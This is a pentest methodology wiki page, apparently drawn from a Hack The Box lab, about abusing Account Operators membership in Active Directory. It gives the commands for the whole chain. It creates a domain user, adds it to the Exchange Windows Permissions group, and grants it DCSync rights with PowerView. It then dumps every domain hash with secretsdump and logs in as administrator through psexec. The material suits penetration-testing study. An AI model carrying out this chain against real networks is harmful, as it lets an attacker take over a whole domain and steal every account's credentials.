> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/methodology/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/methodology/readme/active-directory/exploitation/account-operators.md).

# Account Operators

![](/files/CNG65B8nQGdU36rOLbvA)

Notice how the user we are in is part of a group that is part of account operators. Since we are part of Account Operators we can add a new user to the domain.&#x20;

```
net user lyethar password /add /domain
```

We add ourselves to a group we are also part of as the current user. This is the "Exchange Windows Permissions" group.

![](/files/rJURSGc0qIAzPKKRYHJ4)

```
net group "Exchange Windows Permissions"  /add lyethar
```

We upload Powerview\.ps1 and run the following commands.

```
$pass= ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAINNAME\lyethar', $pass)
Add-DomainObjectAcl  -Credential $cred  -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity lyethar -Rights DCSync
```

Then with the user we created, we run secrets dump to dump all the hashes and then psexec to log in as the administrator.&#x20;
